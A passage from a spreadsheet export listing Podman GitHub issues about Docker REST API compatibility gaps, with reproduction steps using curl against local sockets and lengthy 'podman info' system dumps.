arch: amd64 buildahVersion: 1.27.3 cgroupControllers: - memory - pids cgroupManager: systemd cgroupVersion: v2 conmon: package: conmon-2.1.4-1.el9.x86_64 path: /usr/bin/conmon version: 'conmon version 2.1.4, commit: 56561007b6a59ea175ee9a67384639721499e160' cpuUtilization: idlePercent: 99.66 systemPercent: 0.08 userPercent: 0.26 cpus: 8 distribution: distribution: '"rhel"' version: "9.1" eventLogger: journald hostname: noname idMappings: gidmap: - container_id: 0 host_id: 2019 size: 1 - container_id: 1 host_id: 1476256 size: 65536 uidmap: - container_id: 0 host_id: 2019 size: 1 - container_id: 1 host_id: 1476256 size: 65536 kernel: 5.14.0-162.12.1.el9_1.x86_64 linkmode: dynamic logDriver: journald memFree: 132173471744 memTotal: 134531371008 networkBackend: netavark ociRuntime: name: crun package: crun-1.5-1.el9.x86_64 path: /usr/bin/crun version: |- crun version 1.5 commit: 54ebb8ca8bf7e6ddae2eb919f5b82d1d96863dea spec: 1.0.0 +SYSTEMD +SELINUX +APPARMOR +CAP +SECCOMP +EBPF +CRIU +YAJL os: linux remoteSocket: exists: true path: /run/user/2019/podman/podman.sock security: apparmorEnabled: false capabilities: CAP_NET_RAW,CAP_CHOWN,CAP_DAC_OVERRIDE,CAP_FOWNER,CAP_FSETID,CAP_KILL,CAP_NET_BIND_SERVICE,CAP_SETFCAP,CAP_SETGID,CAP_SETPCAP,CAP_SETUID,CAP_SYS_CHROOT rootless: true seccompEnabled: true seccompProfilePath: /usr/share/containers/seccomp.json selinuxEnabled: true serviceIsRemote: false slirp4netns: executable: /usr/bin/slirp4netns package: slirp4netns-1.2.0-2.el9_0.x86_64 version: |- slirp4netns version 1.2.0 commit: 656041d45cfca7a4176f6b7eed9e4fe6c11e8383 libslirp: 4.4.0 SLIRP_CONFIG_VERSION_MAX: 3 libseccomp: 2.5.2 swapFree: 4294963200 swapTotal: 4294963200 uptime: 73h 7m 7.00s (Approximately 3.04 days) plugins: authorization: null log: - k8s-file - none - passthrough - journald network: - bridge - macvlan volume: - local registries: search: - registry.access.redhat.com - registry.redhat.io - docker.io store: configFile: /home/noname/.config/containers/storage.conf containerStore: number: 0 paused: 0 running: 0 stopped: 0 graphDriverName: overlay graphOptions: {} graphRoot: /home/noname/.local/share/containers/storage graphRootAllocated: 33246150656 graphRootUsed: 2582650880 graphStatus: Backing Filesystem: xfs Native Overlay Diff: "true" Supports d_type: "true" Using metacopy: "false" imageCopyTmpDir: /var/tmp imageStore: number: 4 runRoot: /run/user/2019/containers volumePath: /home/noname/.local/share/containers/storage/volumes version: APIVersion: 4.2.0 Built: 1670843566 BuiltTime: Mon Dec 12 12:12:46 2022 GitCommit: "" GoVersion: go1.18.4 Os: linux OsArch: linux/amd64 Version: 4.2.0   Podman in a container No  Privileged Or Rootless Rootless  Upstream Latest Release No  Additional environment details Additional environment details  Additional information Additional information like issue happens only occasionally or issue happens with a particular architecture or on a particular setting</t>
  </si>
  <si>
    <t>https://github.com/containers/podman/issues/17542</t>
  </si>
  <si>
    <t>Docker compatible `/containers/&lt;id or name&gt;/stop` does not support negative timeouts</t>
  </si>
  <si>
    <t xml:space="preserve"> Issue Description The Docker compatible `/containers/&lt;id or name&gt;/stop` endpoint does not support using a negative timeout. Docker's [spec](https://github.com/moby/moby/blob/master/api/types/container/config.go#L24-L32) for this endpoint states that you can "use '-1' to wait indefinitely." rather then having a set timeout after which the container will be killed. Podman's [implementation](https://github.com/containers/podman/blob/main/pkg/api/handlers/compat/containers_stop.go#L27) of this endpoint utilizes a `uint` rather then an `int`, causing a error to be thrown when using negative values.  Steps to reproduce the issue Steps to reproduce the issue 1. Run a container 2. Send stop request with a negative (indefinite) timeout value of `-1` (if using the Docker Go SDK this will need to be `-1 * time.Second`) 3. Notice the error  Describe the results you received Request returns an error and the container continues to run.  failed to parse parameters for /v1.41/containers/&lt;ID&gt;/stop?t=-1: schema: error converting value for "t"   Describe the results you expected Container is sent a stop signal and is not terminated immediately or after a default timeout.  podman info output yaml host: arch: amd64 buildahVersion: 1.29.0-dev cgroupControllers: - cpu - io - memory - pids cgroupManager: systemd cgroupVersion: v2 conmon: package: conmon-2.1.5-3.fc38.x86_64 path: /usr/bin/conmon version: 'conmon version 2.1.5, commit: ' cpuUtilization: idlePercent: 95.57 systemPercent: 1.1 userPercent: 3.33 cpus: 24 distribution: distribution: fedora variant: silverblue version: "38" eventLogger: journald hostname: matthew-desktop.local idMappings: gidmap: - container_id: 0 host_id: 1000 size: 1 - container_id: 1 host_id: 100000 size: 65536 uidmap: - container_id: 0 host_id: 1000 size: 1 - container_id: 1 host_id: 100000 size: 65536 kernel: 6.2.0-0.rc7.20230208git0983f6bf2bfc.52.fc38.x86_64 linkmode: dynamic logDriver: journald memFree: 72184705024 memTotal: 134972575744 networkBackend: cni ociRuntime: name: crun package: crun-1.8-1.fc38.x86_64 path: /usr/bin/crun version: |- crun version 1.8 commit: 0356bf4aff9a133d655dc13b1d9ac9424706cac4 rundir: /run/user/1000/crun spec: 1.0.0 +SYSTEMD +SELINUX +APPARMOR +CAP +SECCOMP +EBPF +CRIU +LIBKRUN +WASM:wasmedge +YAJL os: linux remoteSocket: exists: true path: /run/user/1000/podman/podman.sock security: apparmorEnabled: false capabilities: CAP_CHOWN,CAP_DAC_OVERRIDE,CAP_FOWNER,CAP_FSETID,CAP_KILL,CAP_NET_BIND_SERVICE,CAP_SETFCAP,CAP_SETGID,CAP_SETPCAP,CAP_SETUID rootless: true seccompEnabled: true seccompProfilePath: /usr/share/containers/seccomp.json selinuxEnabled: true serviceIsRemote: false slirp4netns: executable: /usr/bin/slirp4netns package: slirp4netns-1.2.0-12.fc38.x86_64 version: |- slirp4netns version 1.2.0 commit: 656041d45cfca7a4176f6b7eed9e4fe6c11e8383 libslirp: 4.7.0 SLIRP_CONFIG_VERSION_MAX: 4 libseccomp: 2.5.3 swapFree: 8589930496 swapTotal: 8589930496 uptime: 5h 45m 24.00s (Approximately 0.21 days) plugins: authorization: null log: - k8s-file - none - passthrough - journald network: - bridge - macvlan - ipvlan volume: - local registries: default-route-openshift-image-registry.apps-crc.testing: Blocked: false Insecure: true Location: default-route-openshift-image-registry.apps-crc.testing MirrorByDigestOnly: false Mirrors: null Prefix: default-route-openshift-image-registry.apps-crc.testing PullFromMirror: "" search: - docker.io - quay.io - registry.fedoraproject.org - registry.access.redhat.com store: configFile: /var/home/matthew/.config/containers/storage.conf containerStore: number: 10 paused: 0 running: 8 stopped: 2 graphDriverName: overlay graphOptions: {} graphRoot: /var/home/matthew/.local/share/containers/storage graphRootAllocated: 998483427328 graphRootUsed: 696580554752 graphStatus: Backing Filesystem: btrfs Native Overlay Diff: "true" Supports d_type: "true" Using metacopy: "false" imageCopyTmpDir: /var/tmp imageStore: number: 329 runRoot: /run/user/1000/containers transientStore: false volumePath: /var/home/matthew/.local/share/containers/storage/volumes version: APIVersion: 4.4.0-rc2 Built: 1674134600 BuiltTime: Thu Jan 19 06:23:20 2023 GitCommit: "" GoVersion: go1.20rc3 Os: linux OsArch: linux/amd64 Version: 4.4.0-rc2   Podman in a container No  Privileged Or Rootless Rootless  Upstream Latest Release Yes  Additional environment details _No response_  Additional information _No response_</t>
  </si>
  <si>
    <t>https://github.com/containers/podman/issues/17585</t>
  </si>
  <si>
    <t>Creating an Existing Network Via REST API Returns Different Status Code vs. Docker</t>
  </si>
  <si>
    <t xml:space="preserve"> Issue Description When trying to run [Supabase](https://supabase.com) locally with their CLI you will always get a `network already exists` error. Copied [comment](https://github.com/containers/podman/issues/15499#issuecomment-1331508660) from #15499 by @jgraettinger: &gt; I ran into this while attempting to use the supabase CLI tool with podman instead of docker. &gt; &gt; The supabase CLI spins up a bunch of containers, and at several points [attempts to create a docker &gt; network if it doesn't already exist](https://github.com/supabase/cli/blob/main/internal/utils/docker.go?rgh-link-date=2022-11-30T00%3A57%3A59Z#L51-L68), as determined by [docker library error helpers which are explicitly looking for HTTP 409 status](https://github.com/moby/moby/blob/master/errdefs/http_helpers.go?rgh-link-date=2022-11-30T00%3A57%3A59Z#L20), and don't properly interpret podman's 500. &gt; &gt; I'm unsure if this belongs as a separate issue, but it's an example where the HTTP 500 rather than 409 behavior diverges from the Docker REST API.  Steps to reproduce the issue Steps to reproduce the issue 1. Set up and run a Supabase Project locally - [Guide](https://supabase.com/docs/guides/cli/local-development#prerequisites) 2. See error  Describe the results you received Podman says that the network already exists, but when you run `podman network ls` it does not. None of the containers have started.  Describe the results you expected The containers to all be running and accessible.  podman info output yaml  podman info host: arch: amd64 buildahVersion: 1.28.0 cgroupControllers: [] cgroupManager: cgroupfs cgroupVersion: v1 conmon: package: conmon-2.1.5-1.fc36.x86_64 path: /usr/bin/conmon version: 'conmon version 2.1.5, commit: ' cpuUtilization: idlePercent: 99.68 systemPercent: 0.18 userPercent: 0.14 cpus: 32 distribution: distribution: fedora variant: container version: "36" eventLogger: journald hostname: UMBRA idMappings: gidmap: - container_id: 0 host_id: 1000 size: 1 - container_id: 1 host_id: 100000 size: 65536 uidmap: - container_id: 0 host_id: 1000 size: 1 - container_id: 1 host_id: 100000 size: 65536 kernel: 5.15.57.1-microsoft-standard-WSL2+ linkmode: dynamic logDriver: journald memFree: 15241453568 memTotal: 16722722816 networkBackend: netavark ociRuntime: name: crun package: crun-1.7.2-3.fc36.x86_64 path: /usr/bin/crun version: |- crun version 1.7.2 commit: 0356bf4aff9a133d655dc13b1d9ac9424706cac4 rundir: /run/user/1000/crun spec: 1.0.0 +SYSTEMD +SELINUX +APPARMOR +CAP +SECCOMP +EBPF +CRIU +WASM:wasmedge +YAJL os: linux remoteSocket: exists: true path: /run/user/1000/podman/podman.sock security: apparmorEnabled: false capabilities: CAP_CHOWN,CAP_DAC_OVERRIDE,CAP_FOWNER,CAP_FSETID,CAP_KILL,CAP_NET_BIND_SERVICE,CAP_SETFCAP,CAP_SETGID,CAP_SETPCAP,CAP_SETUID,CAP_SYS_CHROOT rootless: true seccompEnabled: true seccompProfilePath: /usr/share/containers/seccomp.json selinuxEnabled: false serviceIsRemote: true slirp4netns: executable: /usr/bin/slirp4netns slirp4netns version 1.2.0-beta.0 commit: 477db14a24ff1a3de3a705e51ca2c4c1fe3dda64 libslirp: 4.6.1 SLIRP_CONFIG_VERSION_MAX: 3 libseccomp: 2.5.3 swapFree: 4294967296 swapTotal: 4294967296 uptime: 0h 15m 0.00s plugins: authorization: null log: - k8s-file - none - passthrough - journald network: - bridge - macvlan volume: - local registries: search: - docker.io store: configFile: /home/user/.config/containers/storage.conf containerStore: number: 1 paused: 0 running: 0 stopped: 1 graphDriverName: overlay graphOptions: {} graphRoot: /home/user/.local/share/containers/storage graphRootAllocated: 1081101176832 graphRootUsed: 10558271488 graphStatus: Backing Filesystem: extfs Native Overlay Diff: "true" Supports d_type: "true" Using metacopy: "false" imageCopyTmpDir: /var/tmp imageStore: number: 20 runRoot: /run/user/1000/containers transientStore: false volumePath: /home/user/.local/share/containers/storage/volumes version: APIVersion: 4.3.1 Built: 1668180253 BuiltTime: Fri Nov 11 16:24:13 2022 GitCommit: "" GoVersion: go1.18.7 Os: linux OsArch: linux/amd64 Version: 4.3.1   Podman in a container No  Privileged Or Rootless None  Upstream Latest Release Yes  Additional environment details _No response_  Additional information _No response_</t>
  </si>
  <si>
    <t>https://github.com/containers/podman/issues/17762</t>
  </si>
  <si>
    <t>REST API: missing string "sha256" in returned `Id` attribute ( `/v1.24/images/${img}/history` )</t>
  </si>
  <si>
    <t xml:space="preserve"> Issue Description docker returns a string that starts with `sha256:`  $ curl -s --unix-socket /var/run/docker.sock http://localhost/v1.24/images/d74e625d9115/history | jq .[0].Id "sha256:d74e625d91152966d38fe8a62c60daadb96d4b94c1a366de01fab5f334806239"  podman does not  $ curl -s --unix-socket $XDG_RUNTIME_DIR/podman/podman.sock http://localhost/v1.24/images/d74e625d9115/history | jq .[0].Id "d74e625d91152966d38fe8a62c60daadb96d4b94c1a366de01fab5f334806239"   Steps to reproduce the issue 1. `sudo -i` 2. `useradd test1` 3. `usermod -aG docker test1` 4. `machinectl shell test1@` 5. `podman pull alpine:3.17.2` 6. `docker pull alpine:3.17.2` 7. run `podman images` and detect the image id. Record the result in a shell variable `img=d74e625d9115` 9. `systemctl --user start podman.socket` 10. `curl -s --unix-socket /var/run/docker.sock http://localhost/v1.24/images/${img}/history | jq .[0].Id` 11. `curl -s --unix-socket $XDG_RUNTIME_DIR/podman/podman.sock http://localhost/v1.24/images/${img}/history | jq .[0].Id`  Describe the results you received  [test1@localhost ~]$ curl -s --unix-socket /var/run/docker.sock http://localhost/v1.24/images/${img}/history | jq .[0].Id "sha256:d74e625d91152966d38fe8a62c60daadb96d4b94c1a366de01fab5f334806239" [test1@localhost ~]$ curl -s --unix-socket $XDG_RUNTIME_DIR/podman/podman.sock http://localhost/v1.24/images/${img}/history | jq .[0].Id "d74e625d91152966d38fe8a62c60daadb96d4b94c1a366de01fab5f334806239" [test1@localhost ~]$   Describe the results you expected  [test1@localhost ~]$ curl -s --unix-socket /var/run/docker.sock http://localhost/v1.24/images/${img}/history | jq .[0].Id "sha256:d74e625d91152966d38fe8a62c60daadb96d4b94c1a366de01fab5f334806239" [test1@localhost ~]$ curl -s --unix-socket $XDG_RUNTIME_DIR/podman/podman.sock http://localhost/v1.24/images/${img}/history | jq .[0].Id "sha256:d74e625d91152966d38fe8a62c60daadb96d4b94c1a366de01fab5f334806239" [test1@localhost ~]$   podman info output yaml host: arch: arm64 buildahVersion: 1.29.0 cgroupControllers: - memory - pids cgroupManager: systemd cgroupVersion: v2 conmon: package: conmon-2.1.6-3.fc37.aarch64 path: /usr/bin/conmon version: 'conmon version 2.1.6, commit: ' cpuUtilization: idlePercent: 99.65 systemPercent: 0.12 userPercent: 0.24 cpus: 1 distribution: distribution: fedora variant: coreos version: "37" eventLogger: journald hostname: localhost.localdomain idMappings: gidmap: - container_id: 0 host_id: 1001 size: 1 - container_id: 1 host_id: 589824 size: 65536 uidmap: - container_id: 0 host_id: 1001 size: 1 - container_id: 1 host_id: 589824 size: 65536 kernel: 6.1.14-200.fc37.aarch64 linkmode: dynamic logDriver: journald memFree: 925364224 memTotal: 2050260992 networkBackend: netavark ociRuntime: name: crun package: crun-1.8.1-1.fc37.aarch64 path: /usr/bin/crun version: |- crun version 1.8.1 commit: f8a096be060b22ccd3d5f3ebe44108517fbf6c30 rundir: /run/user/1001/crun spec: 1.0.0 +SYSTEMD +SELINUX +APPARMOR +CAP +SECCOMP +EBPF +CRIU +LIBKRUN +WASM:wasmedge +YAJL os: linux remoteSocket: exists: true path: /run/user/1001/podman/podman.sock security: apparmorEnabled: false capabilities: CAP_CHOWN,CAP_DAC_OVERRIDE,CAP_FOWNER,CAP_FSETID,CAP_KILL,CAP_NET_BIND_SERVICE,CAP_SETFCAP,CAP_SETGID,CAP_SETPCAP,CAP_SETUID rootless: true seccompEnabled: true seccompProfilePath: /usr/share/containers/seccomp.json selinuxEnabled: true serviceIsRemote: false slirp4netns: executable: /usr/bin/slirp4netns package: slirp4netns-1.2.0-8.fc37.aarch64 version: |- slirp4netns version 1.2.0 commit: 656041d45cfca7a4176f6b7eed9e4fe6c11e8383 libslirp: 4.7.0 SLIRP_CONFIG_VERSION_MAX: 4 libseccomp: 2.5.3 swapFree: 0 swapTotal: 0 uptime: 31h 18m 41.00s (Approximately 1.29 days) plugins: authorization: null log: - k8s-file - none - passthrough - journald network: - bridge - macvlan volume: - local registries: search: - registry.fedoraproject.org - registry.access.redhat.com - docker.io - quay.io store: configFile: /var/home/test1/.config/containers/storage.conf containerStore: number: 0 paused: 0 running: 0 stopped: 0 graphDriverName: overlay graphOptions: {} graphRoot: /var/home/test1/.local/share/containers/storage graphRootAllocated: 10132369408 graphRootUsed: 1956737024 graphStatus: Backing Filesystem: xfs Native Overlay Diff: "true" Supports d_type: "true" Using metacopy: "false" imageCopyTmpDir: /var/tmp imageStore: number: 1 runRoot: /run/user/1001/containers transientStore: false volumePath: /var/home/test1/.local/share/containers/storage/volumes version: APIVersion: 4.4.1 Built: 1676629538 BuiltTime: Fri Feb 17 10:25:38 2023 GitCommit: "" GoVersion: go1.19.5 Os: linux OsArch: linux/arm64 Version: 4.4.1   Podman in a container No  Privileged Or Rootless Rootless  Upstream Latest Release Yes  Additional environment details The commands above were run with __podman 4.4.1__ on Fedora CoreOS by using qemu on a macOS laptop (operating system: Ventura 13.2.1).  [test1@localhost ~]$ docker version Client: Version: 20.10.23 API version: 1.41 Go version: go1.19.5 Git commit: %{shortcommit_cli} Built: Sun Jan 29 17:38:04 2023 OS/Arch: linux/arm64 Context: default Experimental: true Server: Engine: Version: 20.10.23 API version: 1.41 (minimum version 1.12) Go version: go1.19.5 Git commit: %{shortcommit_moby} Built: Sun Jan 29 17:38:04 2023 OS/Arch: linux/arm64 Experimental: false containerd: Version: 1.6.15 GitCommit: runc: Version: 1.1.4 GitCommit: docker-init: Version: 0.19.0 GitCommit:   [test1@localhost ~]$ podman version Client: Podman Engine Version: 4.4.1 API Version: 4.4.1 Go Version: go1.19.5 Built: Fri Feb 17 10:25:38 2023 OS/Arch: linux/arm64   [test1@localhost ~]$ rpm -q podman podman-4.4.1-3.fc37.aarch64   Additional information I have another computer (arch: amd64) running Fedora 37. I re-run the Podman commands there with __podman 4.4.2__. The container image ID changed and the container image size changed but nothing else.</t>
  </si>
  <si>
    <t>nug</t>
  </si>
  <si>
    <t>https://github.com/containers/podman/issues/17763</t>
  </si>
  <si>
    <t>REST API: missing tag from `/v1.24/images/${img}/history`</t>
  </si>
  <si>
    <t xml:space="preserve"> Issue Description docker returns a tag  $ curl -s --unix-socket /var/run/docker.sock http://localhost/v1.24/images/d74e625d9115/history | jq .[0].Tags [ "alpine:3.17.2" ]  podman does not  $ curl -s --unix-socket $XDG_RUNTIME_DIR/podman/podman.sock http://localhost/v1.24/images/d74e625d9115/history | jq .[0].Tags null   Steps to reproduce the issue 1. `sudo -i` 2. `useradd test1` 3. `usermod -aG docker test1` 4. `machinectl shell test1@` 5. `podman pull alpine:3.17.2` 6. `docker pull alpine:3.17.2` 7. run `podman images` and detect the image id. Record the result in a shell variable `img=d74e625d9115` 9. `systemctl --user start podman.socket` 10. `curl -s --unix-socket /var/run/docker.sock http://localhost/v1.24/images/${img}/history | jq .[0].Tags` 11. `curl -s --unix-socket $XDG_RUNTIME_DIR/podman/podman.sock http://localhost/v1.24/images/d74e625d9115/history | jq .[0].Tags`  Describe the results you received  [test1@localhost ~]$ curl -s --unix-socket /var/run/docker.sock http://localhost/v1.24/images/${img}/history | jq .[0].Tags [ "alpine:3.17.2" ] [test1@localhost ~]$ curl -s --unix-socket $XDG_RUNTIME_DIR/podman/podman.sock http://localhost/v1.24/images/${img}/history | jq .[0].Tags null [test1@localhost ~]$   Describe the results you expected  [test1@localhost ~]$ curl -s --unix-socket /var/run/docker.sock http://localhost/v1.24/images/${img}/history | jq .[0].Tags [ "alpine:3.17.2" ] [test1@localhost ~]$ curl -s --unix-socket $XDG_RUNTIME_DIR/podman/podman.sock http://localhost/v1.24/images/${img}/history | jq .[0].Tags [ "alpine:3.17.2" ] [test1@localhost ~]$   podman info output yaml host: arch: arm64 buildahVersion: 1.29.0 cgroupControllers: - memory - pids cgroupManager: systemd cgroupVersion: v2 conmon: package: conmon-2.1.6-3.fc37.aarch64 path: /usr/bin/conmon version: 'conmon version 2.1.6, commit: ' cpuUtilization: idlePercent: 99.65 systemPercent: 0.12 userPercent: 0.24 cpus: 1 distribution: distribution: fedora variant: coreos version: "37" eventLogger: journald hostname: localhost.localdomain idMappings: gidmap: - container_id: 0 host_id: 1001 size: 1 - container_id: 1 host_id: 589824 size: 65536 uidmap: - container_id: 0 host_id: 1001 size: 1 - container_id: 1 host_id: 589824 size: 65536 kernel: 6.1.14-200.fc37.aarch64 linkmode: dynamic logDriver: journald memFree: 925364224 memTotal: 2050260992 networkBackend: netavark ociRuntime: name: crun package: crun-1.8.1-1.fc37.aarch64 path: /usr/bin/crun version: |- crun version 1.8.1 commit: f8a096be060b22ccd3d5f3ebe44108517fbf6c30 rundir: /run/user/1001/crun spec: 1.0.0 +SYSTEMD +SELINUX +APPARMOR +CAP +SECCOMP +EBPF +CRIU +LIBKRUN +WASM:wasmedge +YAJL os: linux remoteSocket: exists: true path: /run/user/1001/podman/podman.sock security: apparmorEnabled: false capabilities: CAP_CHOWN,CAP_DAC_OVERRIDE,CAP_FOWNER,CAP_FSETID,CAP_KILL,CAP_NET_BIND_SERVICE,CAP_SETFCAP,CAP_SETGID,CAP_SETPCAP,CAP_SETUID rootless: true seccompEnabled: true seccompProfilePath: /usr/share/containers/seccomp.json selinuxEnabled: true serviceIsRemote: false slirp4netns: executable: /usr/bin/slirp4netns package: slirp4netns-1.2.0-8.fc37.aarch64 version: |- slirp4netns version 1.2.0 commit: 656041d45cfca7a4176f6b7eed9e4fe6c11e8383 libslirp: 4.7.0 SLIRP_CONFIG_VERSION_MAX: 4 libseccomp: 2.5.3 swapFree: 0 swapTotal: 0 uptime: 31h 18m 41.00s (Approximately 1.29 days) plugins: authorization: null log: - k8s-file - none - passthrough - journald network: - bridge - macvlan volume: - local registries: search: - registry.fedoraproject.org - registry.access.redhat.com - docker.io - quay.io store: configFile: /var/home/test1/.config/containers/storage.conf containerStore: number: 0 paused: 0 running: 0 stopped: 0 graphDriverName: overlay graphOptions: {} graphRoot: /var/home/test1/.local/share/containers/storage graphRootAllocated: 10132369408 graphRootUsed: 1956737024 graphStatus: Backing Filesystem: xfs Native Overlay Diff: "true" Supports d_type: "true" Using metacopy: "false" imageCopyTmpDir: /var/tmp imageStore: number: 1 runRoot: /run/user/1001/containers transientStore: false volumePath: /var/home/test1/.local/share/containers/storage/volumes version: APIVersion: 4.4.1 Built: 1676629538 BuiltTime: Fri Feb 17 10:25:38 2023 GitCommit: "" GoVersion: go1.19.5 Os: linux OsArch: linux/arm64 Version: 4.4.1   Podman in a container No  Privileged Or Rootless Rootless  Upstream Latest Release Yes  Additional environment details The commands above were run with __podman 4.4.1__ on Fedora CoreOS by using qemu on a macOS laptop (operating system: Ventura 13.2.1).  [test1@localhost ~]$ docker version Client: Version: 20.10.23 API version: 1.41 Go version: go1.19.5 Git commit: %{shortcommit_cli} Built: Sun Jan 29 17:38:04 2023 OS/Arch: linux/arm64 Context: default Experimental: true Server: Engine: Version: 20.10.23 API version: 1.41 (minimum version 1.12) Go version: go1.19.5 Git commit: %{shortcommit_moby} Built: Sun Jan 29 17:38:04 2023 OS/Arch: linux/arm64 Experimental: false containerd: Version: 1.6.15 GitCommit: runc: Version: 1.1.4 GitCommit: docker-init: Version: 0.19.0 GitCommit:   [test1@localhost ~]$ podman version Client: Podman Engine Version: 4.4.1 API Version: 4.4.1 Go Version: go1.19.5 Built: Fri Feb 17 10:25:38 2023 OS/Arch: linux/arm64   [test1@localhost ~]$ rpm -q podman podman-4.4.1-3.fc37.aarch64   Additional information I have another computer (arch: amd64) running Fedora 37. I re-run the Podman commands there with __podman 4.4.2__. The container image ID changed and the container image size changed but nothing else.</t>
  </si>
  <si>
    <t>https://github.com/containers/podman/issues/17778</t>
  </si>
  <si>
    <t>Build image `pull` field type mismatch with Docker</t>
  </si>
  <si>
    <t xml:space="preserve"> Issue Description Docker accepts any string value for the `pull` field to indicate the image should be pulled:https://docs.docker.com/engine/api/v1.42/#tag/Image/operation/ImageBuild Podman expects the value to equal either boolean `true` or string `true`: https://docs.podman.io/en/latest/_static/api.html?version=v4.4#tag/images/operation/ImageBuildLibpod Applications that align with Docker's spec are unable to switch to Podman as building an image with this field fails.  Steps to reproduce the issue 1. POST to the create image endpoint with `pull` set to a string, such as `always`.  Describe the results you received No response stream received  Describe the results you expected Expected a response stream  podman info output yaml host: arch: amd64 buildahVersion: 1.29.0 cgroupControllers: - memory - pids cgroupManager: systemd cgroupVersion: v2 conmon: package: conmon_2:2.1.7-0debian9999+obs15.6_amd64 path: /usr/bin/conmon version: 'conmon version 2.1.7, commit: ' cpuUtilization: idlePercent: 87.46 systemPercent: 5.69 userPercent: 6.84 cpus: 2 distribution: codename: jammy distribution: ubuntu version: "22.04" eventLogger: journald hostname: fv-az646-90 idMappings: gidmap: - container_id: 0 host_id: 123 size: 1 - container_id: 1 host_id: 165536 size: 65536 uidmap: - container_id: 0 host_id: 1001 size: 1 - container_id: 1 host_id: 165536 size: 65536 kernel: 5.15.0-1034-azure linkmode: dynamic logDriver: journald memFree: 4857856000 memTotal: 7281278976 networkBackend: netavark ociRuntime: number: 0 paused: 0 running: 0 stopped: 0 graphDriverName: overlay graphOptions: {} graphRoot: /home/runner/.local/share/containers/storage graphRootAllocated: 89297309696 graphRootUsed: 58336636928 graphStatus: Backing Filesystem: extfs Native Overlay Diff: "true" Supports d_type: "true" Using metacopy: "false" imageCopyTmpDir: /var/tmp imageStore: number: 0 runRoot: /run/user/1001/containers transientStore: false volumePath: /home/runner/.local/share/containers/storage/volumes version: APIVersion: 4.4.2 Built: 0 BuiltTime: Thu Jan 1 00:00:00 1970 GitCommit: "" GoVersion: go1.19.6 Os: linux OsArch: linux/amd64 Version: 4.4.2   Podman in a container Yes  Privileged Or Rootless Rootless  Upstream Latest Release Yes  Additional environment details `DOCKER_HOST=unix:run/user/$(id -u)/podman/podman.sock`  Additional information _No response_</t>
  </si>
  <si>
    <t>https://github.com/containers/podman/issues/17869</t>
  </si>
  <si>
    <t>Stats response has `"Id"` field instead of `"id"`</t>
  </si>
  <si>
    <t xml:space="preserve"> Issue Description The stats API JSON response is inconsistent with Docker, because it incorrectly capitalises the `"id"` field. I discovered this when using the Rust crate [Bollard](https://github.com/fussybeaver/bollard), which reported that the `"id"` field was missing.  Steps to reproduce the issue 1. sh curl --unix-socket /var/run/docker.sock "http://d/containers/$SOME_CONTAINER_ID/stats" # {,"id":"",}  2. sh curl --unix-socket /run/user/1000/podman/podman.sock "http://d/containers/$SOME_CONTAINER_ID/stats" # {,"Id":"",}   Describe the results you received JSON response contains `"Id"` field, but no `"id"`.  Describe the results you expected JSON response should contain `"id"` field.  podman info output yaml host: arch: amd64 buildahVersion: 1.29.0 cgroupControllers: - cpu - memory - pids cgroupManager: systemd cgroupVersion: v2 conmon: package: /usr/bin/conmon is owned by conmon 1:2.1.7-1 path: /usr/bin/conmon version: 'conmon version 2.1.7, commit: f633919178f6c8ee4fb41b848a056ec33f8d707d' cpuUtilization: idlePercent: 79.35 systemPercent: 5.16 userPercent: 15.48 cpus: 8 distribution: distribution: arch version: unknown eventLogger: journald hostname: REDACTED idMappings: gidmap: - container_id: 0 host_id: 1000 size: 1 - container_id: 1 host_id: 100000 size: 65536 uidmap: - container_id: 0 host_id: 1000 size: 1 - container_id: 1 host_id: 100000 size: 65536 kernel: 6.2.6-arch1-1 linkmode: dynamic logDriver: journald memFree: 813850624 memTotal: 24844115968 networkBackend: netavark ociRuntime: name: crun package: /usr/bin/crun is owned by crun 1.8.1-1 path: /usr/bin/crun version: |- crun version 1.8.1 commit: f8a096be060b22ccd3d5f3ebe44108517fbf6c30 rundir: /run/user/1000/crun spec: 1.0.0 +SYSTEMD +SELINUX +APPARMOR +CAP +SECCOMP +EBPF +CRIU +YAJL os: linux remoteSocket: exists: true path: /run/user/1000/podman/podman.sock security: apparmorEnabled: false capabilities: CAP_CHOWN,CAP_DAC_OVERRIDE,CAP_FOWNER,CAP_FSETID,CAP_KILL,CAP_NET_BIND_SERVICE,CAP_SETFCAP,CAP_SETGID,CAP_SETPCAP,CAP_SETUID,CAP_SYS_CHROOT rootless: true seccompEnabled: true seccompProfilePath: /etc/containers/seccomp.json selinuxEnabled: false serviceIsRemote: false slirp4netns: executable: /usr/bin/slirp4netns package: /usr/bin/slirp4netns is owned by slirp4netns 1.2.0-1 version: |- slirp4netns version 1.2.0 commit: 656041d45cfca7a4176f6b7eed9e4fe6c11e8383 libslirp: 4.7.0 SLIRP_CONFIG_VERSION_MAX: 4 libseccomp: 2.5.4 swapFree: 34215489536 swapTotal: 34359734272 uptime: 140h 28m 48.00s (Approximately 5.83 days) plugins: authorization: null log: - k8s-file - none - passthrough - journald network: - bridge - macvlan volume: - local registries: {} store: configFile: /home/REDACTED/.config/containers/storage.conf containerStore: number: 8 paused: 0 running: 8 stopped: 0 graphDriverName: overlay graphOptions: {} graphRoot: /home/REDACTED/.local/share/containers/storage graphRootAllocated: 476673212416 graphRootUsed: 276004855808 graphStatus: Backing Filesystem: f2fs Native Overlay Diff: "true" Supports d_type: "true" Using metacopy: "false" imageCopyTmpDir: /var/tmp imageStore: number: 202 runRoot: /run/user/1000/containers transientStore: false volumePath: /home/REDACTED/.local/share/containers/storage/volumes version: APIVersion: 4.4.2 Built: 1677255177 BuiltTime: Fri Feb 24 17:12:57 2023 GitCommit: 74afe26887f814d1c39925a1624851ef3590e79c-dirty GoVersion: go1.20.1 Os: linux OsArch: linux/amd64 Version: 4.4.2   Podman in a container No  Privileged Or Rootless Rootless  Upstream Latest Release Yes  Additional environment details _No response_  Additional information _No response_</t>
  </si>
  <si>
    <t>https://github.com/containers/podman/issues/18041</t>
  </si>
  <si>
    <t>[apiv2] play/kube test: name is in use, pod already exists</t>
  </si>
  <si>
